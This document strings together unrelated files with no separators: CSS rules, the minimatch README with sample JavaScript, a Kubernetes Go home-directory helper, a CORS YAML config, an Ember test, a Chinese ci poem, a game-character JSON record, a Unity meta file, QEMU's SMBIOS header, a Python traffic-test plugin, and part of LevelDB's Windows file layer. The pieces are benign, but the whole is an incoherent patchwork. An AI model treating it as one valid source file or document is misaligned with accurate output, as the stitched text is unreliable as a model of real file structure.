.row-split {
.col-content {
margin-top: 20px;
}
@media (min-width: @media-xs) {
display: flex;
flex-direction: row;
.col-side {
width: 360px;
}
.col-content {
flex-grow: 1;
margin-top: 0;
}
}
}
.palette-preview {
.rs-panel {
position: relative;
height: 578px;
}
}
.panel-color-wrap {
.panel-color {
th,
td {
text-align: left;
padding: 11px;
font-family: 'DejaVu Sans Mono', monospace;
}
}
}
.palette-logo-tool {
margin-top: 20px;
}
.palette-image-preview {
position: relative;
margin-top: 20px;
padding: 10px;
border-radius: 6px;
}
.palette-image-position-dot {
position: absolute;
background: #fff;
width: 8px;
height: 8px;
border-radius: 4px;
border: 1px solid #000;
}
.circle-picker-wrapper {
display: inline-block;
vertical-align: top;
}
.sketch-picker-wrapper {
margin-left: 20px;
display: inline-block;
position: relative;
.sketch-color-review {
padding: 5px;
background: rgb(255, 255, 255);
border-radius: 1px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 0px 1px;
display: inline-block;
cursor: pointer;
}
.sketch-color-value {
width: 68px;
height: 100px;
border-radius: 2px;
}
.sketch-picker-overlay {
position: absolute;
z-index: 2;
}
.sketch-picker-backdrop {
position: fixed;
top: 0px;
right: 0px;
bottom: 0px;
left: 0px;
}
}
# minimatch
A minimal matching utility.
[![Build Status](https://secure.travis-ci.org/isaacs/minimatch.png)](http://travis-ci.org/isaacs/minimatch)
This is the matching library used internally by npm.
Eventually, it will replace the C binding in node-glob.
It works by converting glob expressions into JavaScript `RegExp`
objects.
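As a rough illustration of that idea (a toy sketch, not minimatch's actual parser), a glob limited to `*` and `?` can be turned into a `RegExp` like so:

```javascript
// Toy glob-to-RegExp converter: handles only "*" and "?". Real minimatch
// also handles braces, extglobs, globstars, negation, and comments.
function globToRegExp(glob) {
  var source = glob
    .replace(/[.+^${}()|[\]\\]/g, "\\$&") // escape regexp metacharacters
    .replace(/\*/g, "[^/]*")              // "*" matches within one path part
    .replace(/\?/g, "[^/]");              // "?" matches a single character
  return new RegExp("^" + source + "$");
}

globToRegExp("*.foo").test("bar.foo"); // true
globToRegExp("*.bar").test("bar.foo"); // false
```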
## Usage
```javascript
var minimatch = require("minimatch")
minimatch("bar.foo", "*.foo") // true!
minimatch("bar.foo", "*.bar") // false!
minimatch("bar.foo", "*.+(bar|foo)", { debug: true }) // true, and noisy!
```
## Features
Supports these glob features:
* Brace Expansion
* Extended glob matching
* "Globstar" `**` matching
See:
* `man sh`
* `man bash`
* `man 3 fnmatch`
* `man 5 gitignore`
## Minimatch Class
Create a minimatch object by instantiating the `minimatch.Minimatch` class.
```javascript
var Minimatch = require("minimatch").Minimatch
var mm = new Minimatch(pattern, options)
```
### Properties
* `pattern` The original pattern the minimatch object represents.
* `options` The options supplied to the constructor.
* `set` A 2-dimensional array of regexp or string expressions.
Each row in the
array corresponds to a brace-expanded pattern. Each item in the row
corresponds to a single path-part. For example, the pattern
`{a,b/c}/d` would expand to a set of patterns like:
    [ [ a, d ]
    , [ b, c, d ] ]
If a portion of the pattern doesn't have any "magic" in it
(that is, it's something like `"foo"` rather than `fo*o?`), then it
will be left as a string rather than converted to a regular
expression.
* `regexp` Created by the `makeRe` method. A single regular expression
expressing the entire pattern. This is useful in cases where you wish
to use the pattern somewhat like `fnmatch(3)` with `FNM_PATH` enabled.
* `negate` True if the pattern is negated.
* `comment` True if the pattern is a comment.
* `empty` True if the pattern is `""`.
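To make the shape of `set` concrete, here is the `{a,b/c}/d` example as plain data (the brace expansion is shown pre-computed; minimatch performs it internally):

```javascript
// Each row of `set` is one brace-expanded pattern, split into path parts.
var expanded = ["a/d", "b/c/d"]; // "{a,b/c}/d" after brace expansion
var set = expanded.map(function (p) { return p.split("/"); });
// set => [ [ "a", "d" ], [ "b", "c", "d" ] ]
```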
### Methods
* `makeRe` Generate the `regexp` member if necessary, and return it.
Will return `false` if the pattern is invalid.
* `match(fname)` Return true if the filename matches the pattern, or
false otherwise.
* `matchOne(fileArray, patternArray, partial)` Take a `/`-split
filename, and match it against a single row in the `regExpSet`. This
method is mainly for internal use, but is exposed so that it can be
used by a glob-walker that needs to avoid excessive filesystem calls.
All other methods are internal, and will be called as necessary.
## Functions
The top-level exported function has a `cache` property, which is an LRU
cache set to store 100 items. So, calling these methods repeatedly
with the same pattern and options will use the same Minimatch object,
saving the cost of parsing it multiple times.
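A minimal sketch of that kind of keyed LRU memoization (not the implementation minimatch actually uses) looks like this:

```javascript
// Tiny LRU cache: evicts the least recently used entry past maxSize.
// Map preserves insertion order, so the first key is always the oldest.
function makeLru(maxSize) {
  var map = new Map();
  return {
    get: function (key) {
      if (!map.has(key)) return undefined;
      var value = map.get(key);
      map.delete(key);      // re-insert to mark as most recently used
      map.set(key, value);
      return value;
    },
    set: function (key, value) {
      if (map.has(key)) map.delete(key);
      map.set(key, value);
      if (map.size > maxSize) map.delete(map.keys().next().value); // evict oldest
    }
  };
}
```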
### minimatch(path, pattern, options)
Main export. Tests a path against the pattern using the options.
```javascript
var isJS = minimatch(file, "*.js", { matchBase: true })
```
### minimatch.filter(pattern, options)
Returns a function that tests its
supplied argument, suitable for use with `Array.filter`. Example:
```javascript
var javascripts = fileList.filter(minimatch.filter("*.js", {matchBase: true}))
```
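`minimatch.filter` is essentially a closure over the pattern and options. A stand-in version, using a literal suffix check instead of real glob matching, shows the shape:

```javascript
// Hypothetical stand-in for minimatch.filter: returns a predicate suitable
// for Array.prototype.filter, but matches only a literal ".ext" suffix.
function suffixFilter(ext) {
  return function (file) { return file.slice(-ext.length) === ext; };
}

["a.js", "b.txt", "c.js"].filter(suffixFilter(".js")); // [ "a.js", "c.js" ]
```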
### minimatch.match(list, pattern, options)
Match against the list of
files, in the style of fnmatch or glob. If nothing is matched, and
options.nonull is set, then return a list containing the pattern itself.
```javascript
var javascripts = minimatch.match(fileList, "*.js", {matchBase: true})
```
### minimatch.makeRe(pattern, options)
Make a regular expression object from the pattern.
## Options
All options are `false` by default.
### debug
Dump a ton of stuff to stderr.
### nobrace
Do not expand `{a,b}` and `{1..3}` brace sets.
### noglobstar
Disable `**` matching against multiple folder names.
### dot
Allow patterns to match filenames starting with a period, even if
the pattern does not explicitly have a period in that spot.
Note that by default, `a/**/b` will **not** match `a/.d/b`, unless `dot`
is set.
### noext
Disable "extglob" style patterns like `+(a|b)`.
### nocase
Perform a case-insensitive match.
### nonull
When a match is not found by `minimatch.match`, return a list containing
the pattern itself. When unset, an empty list is returned if there are
no matches.
### matchBase
If set, then patterns without slashes will be matched
against the basename of the path if it contains slashes. For example,
`a?b` would match the path `/xyz/123/acb`, but not `/xyz/acb/123`.
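The rule can be sketched with a hypothetical helper (a toy single-character matcher stands in for real glob matching):

```javascript
// If the pattern has no slashes and the path does, compare against the
// path's basename; otherwise compare against the whole path.
function matchBasename(path, pattern, matches) {
  var target = (pattern.indexOf("/") === -1 && path.indexOf("/") !== -1)
    ? path.split("/").pop() // basename
    : path;
  return matches(target, pattern);
}

// Toy matcher: "?" matches any single character, everything else is literal.
function toyMatch(str, pattern) {
  if (str.length !== pattern.length) return false;
  for (var i = 0; i < str.length; i++) {
    if (pattern[i] !== "?" && pattern[i] !== str[i]) return false;
  }
  return true;
}

matchBasename("/xyz/123/acb", "a?b", toyMatch); // true
matchBasename("/xyz/acb/123", "a?b", toyMatch); // false
```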
### nocomment
Suppress the behavior of treating `#` at the start of a pattern as a
comment.
### nonegate
Suppress the behavior of treating a leading `!` character as negation.
### flipNegate
Returns from negated expressions the same as if they were not negated.
(I.e., true on a hit, false on a miss.)
## Comparisons to other fnmatch/glob implementations
While strict compliance with the existing standards is a worthwhile
goal, some discrepancies exist between minimatch and other
implementations, and are intentional.
If the pattern starts with a `!` character, then it is negated. Set the
`nonegate` flag to suppress this behavior, and treat leading `!`
characters normally. This is perhaps relevant if you wish to start the
pattern with a negative extglob pattern like `!(a|B)`. Multiple `!`
characters at the start of a pattern will negate the pattern multiple
times.
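That leading-`!` handling can be sketched as follows (toy code, not minimatch's internals):

```javascript
// Strip leading "!" characters, toggling negation once per "!".
function parseNegation(pattern) {
  var negate = false;
  var i = 0;
  while (pattern[i] === "!") {
    negate = !negate;
    i++;
  }
  return { negate: negate, pattern: pattern.slice(i) };
}

parseNegation("!*.js");  // { negate: true,  pattern: "*.js" }
parseNegation("!!*.js"); // { negate: false, pattern: "*.js" }
```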
If a pattern starts with `#`, then it is treated as a comment, and
will not match anything. Use `\#` to match a literal `#` at the
start of a line, or set the `nocomment` flag to suppress this behavior.
The double-star character `**` is supported by default, unless the
`noglobstar` flag is set. This is supported in the manner of bsdglob
and bash 4.1, where `**` only has special significance if it is the only
thing in a path part. That is, `a/**/b` will match `a/x/y/b`, but
`a/**b` will not.
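That rule — `**` is special only when it is an entire path part — can be sketched as a recursive part-by-part matcher (a simplified, assumption-laden stand-in for minimatch's `matchOne`):

```javascript
// Match path parts against pattern parts. A bare "**" part may consume
// zero or more path parts; "**" embedded in a part (like "**b") is treated
// as an ordinary literal here, so it cannot span path separators.
function matchParts(fileParts, patternParts) {
  if (patternParts.length === 0) return fileParts.length === 0;
  var p = patternParts[0];
  if (p === "**") {
    for (var skip = 0; skip <= fileParts.length; skip++) {
      if (matchParts(fileParts.slice(skip), patternParts.slice(1))) return true;
    }
    return false;
  }
  return fileParts.length > 0 && fileParts[0] === p &&
         matchParts(fileParts.slice(1), patternParts.slice(1));
}

function globstarMatch(path, pattern) {
  return matchParts(path.split("/"), pattern.split("/"));
}

globstarMatch("a/x/y/b", "a/**/b"); // true
globstarMatch("a/x/y/b", "a/**b");  // false: "**b" is not a bare "**" part
```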
If an escaped pattern has no matches, and the `nonull` flag is set,
then minimatch.match returns the pattern as-provided, rather than
interpreting the character escapes. For example,
`minimatch.match([], "\\*a\\?")` will return `"\\*a\\?"` rather than
`"*a?"`. This is akin to setting the `nullglob` option in bash, except
that it does not resolve escaped pattern characters.
If brace expansion is not disabled, then it is performed before any
other interpretation of the glob pattern. Thus, a pattern like
`+(a|{b),c)}`, which would not be valid in bash or zsh, is expanded
**first** into the set of `+(a|b)` and `+(a|c)`, and those patterns are
checked for validity. Since those two are valid, matching proceeds.
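A minimal sketch of single-level brace expansion (not minimatch's real implementation; nested braces and numeric ranges like `{1..3}` are omitted):

```javascript
// Expand the first {a,b,...} group found, then recurse until none remain.
function braceExpand(pattern) {
  var m = pattern.match(/^(.*?)\{([^{}]+)\}(.*)$/);
  if (!m || m[2].indexOf(",") === -1) return [pattern];
  var results = [];
  m[2].split(",").forEach(function (alt) {
    braceExpand(m[1] + alt + m[3]).forEach(function (p) { results.push(p); });
  });
  return results;
}

braceExpand("+(a|{b),c)}"); // [ "+(a|b)", "+(a|c)" ]
braceExpand("{a,b/c}/d");   // [ "a/d", "b/c/d" ]
```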
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package homedir
import (
"os"
"path/filepath"
"runtime"
)
// HomeDir returns the home directory for the current user.
// On Windows:
// 1. the first of %HOME%, %HOMEDRIVE%%HOMEPATH%, %USERPROFILE% containing a `.kube\config` file is returned.
// 2. if none of those locations contain a `.kube\config` file, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists and is writeable is returned.
// 3. if none of those locations are writeable, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists is returned.
// 4. if none of those locations exists, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that is set is returned.
func HomeDir() string {
if runtime.GOOS == "windows" {
home := os.Getenv("HOME")
homeDriveHomePath := ""
if homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH"); len(homeDrive) > 0 && len(homePath) > 0 {
homeDriveHomePath = homeDrive + homePath
}
userProfile := os.Getenv("USERPROFILE")
// Return first of %HOME%, %HOMEDRIVE%/%HOMEPATH%, %USERPROFILE% that contains a `.kube\config` file.
// %HOMEDRIVE%/%HOMEPATH% is preferred over %USERPROFILE% for backwards-compatibility.
for _, p := range []string{home, homeDriveHomePath, userProfile} {
if len(p) == 0 {
continue
}
if _, err := os.Stat(filepath.Join(p, ".kube", "config")); err != nil {
continue
}
return p
}
firstSetPath := ""
firstExistingPath := ""
// Prefer %USERPROFILE% over %HOMEDRIVE%/%HOMEPATH% for compatibility with other auth-writing tools
for _, p := range []string{home, userProfile, homeDriveHomePath} {
if len(p) == 0 {
continue
}
if len(firstSetPath) == 0 {
// remember the first path that is set
firstSetPath = p
}
info, err := os.Stat(p)
if err != nil {
continue
}
if len(firstExistingPath) == 0 {
// remember the first path that exists
firstExistingPath = p
}
if info.IsDir() && info.Mode().Perm()&(1<<(uint(7))) != 0 {
// return first path that is writeable
return p
}
}
// If none are writeable, return first location that exists
if len(firstExistingPath) > 0 {
return firstExistingPath
}
// If none exist, return first location that is set
if len(firstSetPath) > 0 {
return firstSetPath
}
// We've got nothing
return ""
}
return os.Getenv("HOME")
}
nelmio_cors:
defaults:
origin_regex: true
allow_origin: ['%env(CORS_ALLOW_ORIGIN)%']
allow_methods: ['GET', 'OPTIONS', 'POST', 'PUT', 'PATCH', 'DELETE']
allow_headers: ['Content-Type', 'Authorization', 'Preload', 'Fields']
expose_headers: ['Link']
max_age: 3600
paths:
'^/': null
import { run } from '@ember/runloop';
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import setupStyles from '../helpers/render-with-styles';
module('Integration | Changing local classes', function(hooks) {
setupRenderingTest(hooks);
test('changing a dynamic class value works', async function(assert) {
const hbs = setupStyles({
foo: '--foo',
bar: '--bar',
baz: '--baz'
});
this.set('extraClass', 'bar');
await render(hbs`<div data-test-element class="global" local-class="foo {{extraClass}}"></div>`);
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --bar');
run(() => this.set('extraClass', 'baz'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --baz');
run(() => this.set('extraClass', 'qux'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo');
});
});
form=词
tags=
放扁舟、万山环处,
平铺碧浪千顷。
仙人怜我征尘久,
借与梦游清枕。
风乍静。
望两岸群峰,
倒浸玻璃影。
楼台相映。
更日薄烟轻,
荷花似醉,
飞鸟堕寒镜。
中都内,
罗绮千街万井。
天教此地幽胜。
仇池仙伯今何在,
堤柳几眠还醒。
君试问。
□此意、只今更有何人领。
功名未竟。
待学取鸱夷,
仍携西子,
来动五湖兴。
{
"gender": "female",
"species": "ostrich",
"birthday": "7-31",
"games": {
"afe+": {
"personality": "snooty",
"clothes": "red-aloha-shirt",
"song": "K.K. Sonata"
},
"nl": {
"personality": "snooty",
"clothes": "purple-tie-dye-tee",
"song": "K.K. Sonata",
"phrase": "dahling",
"skill": "Computing",
"goal": "CEO",
"fear": "Mummy Mask",
"quote": "Cut once, measure twice... Wait- reverse that.",
"siblings": "Youngest triplet",
"favoriteStyle": "Basic",
"dislikedStyle": "Rock",
"favoriteColor": "Red",
"coffee": {
"beans": "Blue Mountain",
"milk": "Lots of milk",
"sugar": "3 spoonfuls of sugar"
}
},
"nh": {
"personality": "snooty",
"phrase": "dahling",
"song": "K.K. Sonata"
}
},
"name": "Julia",
"id": "julia"
}
fileFormatVersion: 2
guid: 91035448860ba4e708919485c73f7edc
timeCreated: 1442945121
licenseType: Pro
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
#ifndef QEMU_SMBIOS_H
#define QEMU_SMBIOS_H
/*
* SMBIOS Support
*
* Copyright (C) 2009 Hewlett-Packard Development Company, L.P.
*
* Authors:
* Alex Williamson <alex.williamson@hp.com>
*
* This work is licensed under the terms of the GNU GPL, version 2. See
* the COPYING file in the top-level directory.
*
*/
#include "qemu/option.h"
#define SMBIOS_MAX_TYPE 127
/* memory area description, used by type 19 table */
struct smbios_phys_mem_area {
uint64_t address;
uint64_t length;
};
/*
* SMBIOS spec defined tables
*/
typedef enum SmbiosEntryPointType {
SMBIOS_ENTRY_POINT_21,
SMBIOS_ENTRY_POINT_30,
} SmbiosEntryPointType;
/* SMBIOS Entry Point
* There are two types of entry points defined in the SMBIOS specification
* (see below). BIOS must place the entry point(s) at a 16-byte-aligned
* address between 0xf0000 and 0xfffff. Note that either entry point type
* can be used in a 64-bit target system, except that SMBIOS 2.1 entry point
* only allows the SMBIOS struct table to reside below 4GB address space.
*/
/* SMBIOS 2.1 (32-bit) Entry Point
* - introduced since SMBIOS 2.1
* - supports structure table below 4GB only
*/
struct smbios_21_entry_point {
uint8_t anchor_string[4];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint16_t max_structure_size;
uint8_t entry_point_revision;
uint8_t formatted_area[5];
uint8_t intermediate_anchor_string[5];
uint8_t intermediate_checksum;
uint16_t structure_table_length;
uint32_t structure_table_address;
uint16_t number_of_structures;
uint8_t smbios_bcd_revision;
} QEMU_PACKED;
/* SMBIOS 3.0 (64-bit) Entry Point
* - introduced since SMBIOS 3.0
* - supports structure table at 64-bit address space
*/
struct smbios_30_entry_point {
uint8_t anchor_string[5];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint8_t smbios_doc_rev;
uint8_t entry_point_revision;
uint8_t reserved;
uint32_t structure_table_max_size;
uint64_t structure_table_address;
} QEMU_PACKED;
typedef union {
struct smbios_21_entry_point ep21;
struct smbios_30_entry_point ep30;
} QEMU_PACKED SmbiosEntryPoint;
/* This goes at the beginning of every SMBIOS structure. */
struct smbios_structure_header {
uint8_t type;
uint8_t length;
uint16_t handle;
} QEMU_PACKED;
/* SMBIOS type 0 - BIOS Information */
struct smbios_type_0 {
struct smbios_structure_header header;
uint8_t vendor_str;
uint8_t bios_version_str;
uint16_t bios_starting_address_segment;
uint8_t bios_release_date_str;
uint8_t bios_rom_size;
uint64_t bios_characteristics;
uint8_t bios_characteristics_extension_bytes[2];
uint8_t system_bios_major_release;
uint8_t system_bios_minor_release;
uint8_t embedded_controller_major_release;
uint8_t embedded_controller_minor_release;
} QEMU_PACKED;
/* UUID encoding. The time_* fields are little-endian, as specified by SMBIOS
* version 2.6.
*/
struct smbios_uuid {
uint32_t time_low;
uint16_t time_mid;
uint16_t time_hi_and_version;
uint8_t clock_seq_hi_and_reserved;
uint8_t clock_seq_low;
uint8_t node[6];
} QEMU_PACKED;
/* SMBIOS type 1 - System Information */
struct smbios_type_1 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_name_str;
uint8_t version_str;
uint8_t serial_number_str;
struct smbios_uuid uuid;
uint8_t wake_up_type;
uint8_t sku_number_str;
uint8_t family_str;
} QEMU_PACKED;
/* SMBIOS type 2 - Base Board */
struct smbios_type_2 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_str;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t feature_flags;
uint8_t location_str;
uint16_t chassis_handle;
uint8_t board_type;
uint8_t contained_element_count;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 3 - System Enclosure (v2.7) */
struct smbios_type_3 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t type;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t boot_up_state;
uint8_t power_supply_state;
uint8_t thermal_state;
uint8_t security_status;
uint32_t oem_defined;
uint8_t height;
uint8_t number_of_power_cords;
uint8_t contained_element_count;
uint8_t sku_number_str;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 4 - Processor Information (v2.6) */
struct smbios_type_4 {
struct smbios_structure_header header;
uint8_t socket_designation_str;
uint8_t processor_type;
uint8_t processor_family;
uint8_t processor_manufacturer_str;
uint32_t processor_id[2];
uint8_t processor_version_str;
uint8_t voltage;
uint16_t external_clock;
uint16_t max_speed;
uint16_t current_speed;
uint8_t status;
uint8_t processor_upgrade;
uint16_t l1_cache_handle;
uint16_t l2_cache_handle;
uint16_t l3_cache_handle;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t core_count;
uint8_t core_enabled;
uint8_t thread_count;
uint16_t processor_characteristics;
uint16_t processor_family2;
} QEMU_PACKED;
/* SMBIOS type 16 - Physical Memory Array (v2.7) */
struct smbios_type_16 {
struct smbios_structure_header header;
uint8_t location;
uint8_t use;
uint8_t error_correction;
uint32_t maximum_capacity;
uint16_t memory_error_information_handle;
uint16_t number_of_memory_devices;
uint64_t extended_maximum_capacity;
} QEMU_PACKED;
/* SMBIOS type 17 - Memory Device (v2.8) */
struct smbios_type_17 {
struct smbios_structure_header header;
uint16_t physical_memory_array_handle;
uint16_t memory_error_information_handle;
uint16_t total_width;
uint16_t data_width;
uint16_t size;
uint8_t form_factor;
uint8_t device_set;
uint8_t device_locator_str;
uint8_t bank_locator_str;
uint8_t memory_type;
uint16_t type_detail;
uint16_t speed;
uint8_t manufacturer_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t attributes;
uint32_t extended_size;
uint16_t configured_clock_speed;
uint16_t minimum_voltage;
uint16_t maximum_voltage;
uint16_t configured_voltage;
} QEMU_PACKED;
/* SMBIOS type 19 - Memory Array Mapped Address (v2.7) */
struct smbios_type_19 {
struct smbios_structure_header header;
uint32_t starting_address;
uint32_t ending_address;
uint16_t memory_array_handle;
uint8_t partition_width;
uint64_t extended_starting_address;
uint64_t extended_ending_address;
} QEMU_PACKED;
/* SMBIOS type 32 - System Boot Information */
struct smbios_type_32 {
struct smbios_structure_header header;
uint8_t reserved[6];
uint8_t boot_status;
} QEMU_PACKED;
/* SMBIOS type 127 -- End-of-table */
struct smbios_type_127 {
struct smbios_structure_header header;
} QEMU_PACKED;
void smbios_entry_add(QemuOpts *opts);
void smbios_set_cpuid(uint32_t version, uint32_t features);
void smbios_set_defaults(const char *manufacturer, const char *product,
const char *version, bool legacy_mode,
bool uuid_encoded, SmbiosEntryPointType ep_type);
uint8_t *smbios_get_table_legacy(size_t *length);
void smbios_get_tables(const struct smbios_phys_mem_area *mem_array,
const unsigned int mem_array_size,
uint8_t **tables, size_t *tables_len,
uint8_t **anchor, size_t *anchor_len);
#endif /* QEMU_SMBIOS_H */
import astf_path
class ErrorLogger():
def __init__(self, name, allowed_errors):
self.iteration_counter = 0
self.name = name
self.client_allowed_errors = set(allowed_errors['client'])
self.server_allowed_errors = set(allowed_errors['server'])
self.iteration_to_mult_map = {}
self.iteration_to_error_map = {}
def increment_iteration_counter(self):
self.iteration_counter += 1
def log(self, errors):
self.iteration_to_error_map[self.iteration_counter] = errors
def log_multiplier(self, mult):
self.iteration_to_mult_map[self.iteration_counter] = mult
def should_stop(self):
return self.iteration_counter == 5
def invalid_errors(self, errors):
client_errors = set(errors.get('client', []))
server_errors = set(errors.get('server', []))
return not (client_errors.issubset(self.client_allowed_errors) and server_errors.issubset(self.server_allowed_errors))
class ErrorLoggingNDRPlugin():
def __init__(self, **kwargs):
allowed_errors = {'client': {u'tcps_conndrops': u'embryonic connections dropped'},
'server': {u'err_no_template': u"server can't match L7 template",
u'err_no_syn': u'server first flow packet with no SYN'}
}
self.logger = ErrorLogger(name="Plugin Demonstration for ASTF NDR", allowed_errors=allowed_errors)
def pre_iteration(self, run_results=None, **kwargs):
pass
def post_iteration(self, run_results, **kwargs):
if run_results['error_flag']:
self.logger.log(run_results['errors'])
self.logger.log_multiplier(run_results['mult'])
self.logger.increment_iteration_counter()
should_stop = self.logger.should_stop()
invalid_errors = self.logger.invalid_errors(run_results['errors'])
return should_stop, invalid_errors
# dynamic load of python module
def register():
return ErrorLoggingNDRPlugin()
// Copyright (c) 2018 The LevelDB Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file. See the AUTHORS file for names of contributors.
// Prevent Windows headers from defining min/max macros and instead
// use STL.
#ifndef NOMINMAX
#define NOMINMAX
#endif // ifndef NOMINMAX
#include <windows.h>
#include <algorithm>
#include <atomic>
#include <cassert>
#include <chrono>
#include <condition_variable>
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <limits>
#include <memory>
#include <mutex>
#include <queue>
#include <sstream>
#include <string>
#include <vector>
#include "leveldb/env.h"
#include "leveldb/slice.h"
#include "port/port.h"
#include "port/thread_annotations.h"
#include "util/env_windows_test_helper.h"
#include "util/logging.h"
#include "util/mutexlock.h"
#include "util/windows_logger.h"
namespace leveldb {
namespace {
constexpr const size_t kWritableFileBufferSize = 65536;
// Up to 1000 mmaps for 64-bit binaries; none for 32-bit.
constexpr int kDefaultMmapLimit = (sizeof(void*) >= 8) ? 1000 : 0;
// Can be set by EnvWindowsTestHelper::SetReadOnlyMMapLimit().
int g_mmap_limit = kDefaultMmapLimit;
std::string GetWindowsErrorMessage(DWORD error_code) {
std::string message;
char* error_text = nullptr;
// Use MBCS version of FormatMessage to match return value.
size_t error_text_size = ::FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
nullptr, error_code, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
reinterpret_cast<char*>(&error_text), 0, nullptr);
if (!error_text) {
return message;
}
message.assign(error_text, error_text_size);
::LocalFree(error_text);
return message;
}
Status WindowsError(const std::string& context, DWORD error_code) {
if (error_code == ERROR_FILE_NOT_FOUND || error_code == ERROR_PATH_NOT_FOUND)
return Status::NotFound(context, GetWindowsErrorMessage(error_code));
return Status::IOError(context, GetWindowsErrorMessage(error_code));
}
class ScopedHandle {
public:
ScopedHandle(HANDLE handle) : handle_(handle) {}
ScopedHandle(const ScopedHandle&) = delete;
ScopedHandle(ScopedHandle&& other) noexcept : handle_(other.Release()) {}
~ScopedHandle() { Close(); }
ScopedHandle& operator=(const ScopedHandle&) = delete;
ScopedHandle& operator=(ScopedHandle&& rhs) noexcept {
if (this != &rhs) handle_ = rhs.Release();
return *this;
}
bool Close() {
if (!is_valid()) {
return true;
}
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return ::CloseHandle(h);
}
bool is_valid() const {
return handle_ != INVALID_HANDLE_VALUE && handle_ != nullptr;
}
HANDLE get() const { return handle_; }
HANDLE Release() {
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return h;
}
private:
HANDLE handle_;
};
// Helper class to limit resource usage to avoid exhaustion.
// Currently used to limit read-only file descriptors and mmap file usage
// so that we do not run out of file descriptors or virtual memory, or run into
// kernel performance problems for very large databases.
class Limiter {
public:
// Limit maximum number of resources to |max_acquires|.
Limiter(int max_acquires) : acquires_allowed_(max_acquires) {}
Limiter(const Limiter&) = delete;
Limiter operator=(const Limiter&) = delete;
// If another resource is available, acquire it and return true.
// Else return false.
bool Acquire() {
int old_acquires_allowed =
acquires_allowed_.fetch_sub(1, std::memory_order_relaxed);
if (old_acquires_allowed > 0) return true;
acquires_allowed_.fetch_add(1, std::memory_order_relaxed);
return false;
}
// Release a resource acquired by a previous call to Acquire() that returned
// true.
void Release() { acquires_allowed_.fetch_add(1, std::memory_order_relaxed); }
private:
// The number of available resources.
//
// This is a counter and is not tied to the invariants of any other class, so
// it can be operated on safely using std::memory_order_relaxed.
std::atomic<int> acquires_allowed_;
};
class WindowsSequentialFile : public SequentialFile {
public:
WindowsSequentialFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsSequentialFile() override {}
Status Read(size_t n, Slice* result, char* scratch) override {
DWORD bytes_read;
// DWORD is 32-bit, but size_t could technically be larger. However leveldb
// files are limited to leveldb::Options::max_file_size which is clamped to
// 1<<30 or 1 GiB.
assert(n <= std::numeric_limits<DWORD>::max());
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
nullptr)) {
return WindowsError(filename_, ::GetLastError());
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
Status Skip(uint64_t n) override {
LARGE_INTEGER distance;
distance.QuadPart = n;
if (!::SetFilePointerEx(handle_.get(), distance, nullptr, FILE_CURRENT)) {
return WindowsError(filename_, ::GetLastError());
}
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsRandomAccessFile : public RandomAccessFile {
public:
WindowsRandomAccessFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsRandomAccessFile() override = default;
Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
DWORD bytes_read = 0;
OVERLAPPED overlapped = {0};
overlapped.OffsetHigh = static_cast<DWORD>(offset >> 32);
overlapped.Offset = static_cast<DWORD>(offset);
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
&overlapped)) {
DWORD error_code = ::GetLastError();
if (error_code != ERROR_HANDLE_EOF) {
*result = Slice(scratch, 0);
return Status::IOError(filename_, GetWindowsErrorMessage(error_code));
}
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsMmapReadableFile : public RandomAccessFile {
public:
// base[0,length-1] contains the mmapped contents of the file.
WindowsMmapReadableFile(std::string filename, char* mmap_base, size_t length,
Limiter* mmap_limiter)
: mmap_base_(mmap_base),
length_(length),
mmap_limiter_(mmap_limiter),
filename_(std::move(filename)) {}
~WindowsMmapReadableFile() override {
::UnmapViewOfFile(mmap_base_);
mmap_limiter_->Release();
}
